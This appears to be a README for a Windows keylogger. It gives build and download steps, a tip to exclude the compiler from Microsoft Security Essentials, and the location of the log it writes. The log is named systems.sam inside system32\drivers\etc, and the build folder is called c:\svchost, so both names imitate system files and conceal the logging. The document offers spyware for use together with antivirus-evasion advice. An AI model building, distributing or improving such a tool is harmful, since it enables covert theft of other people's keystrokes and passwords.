Simple & Basic Key Logger for windows.
- Install LCC 32 bit http://www.cs.virginia.edu/~lcc-win32/
- dowload the attachment
- open cmd.exe
- set PATH=%PATH%;c:\lcc\bin
- cd c:\svchost
- compile.cmd
https://raw.github.com/ukoreh/keylogger/master/binary.zip
Note, when installing LCC make sure to disable security essentials from MS It was due to "Microsoft Security Essentials" on my computer. I went to settings and excluded C:\lcc and reinstalled lcc. Libs are then build correctly.
What to expect
- execute once to start log keys
- execute once more to stop log keys
- the created file is in %windir%\system32\drivers\etc\systems.sam
- no file roatation
- tested in XP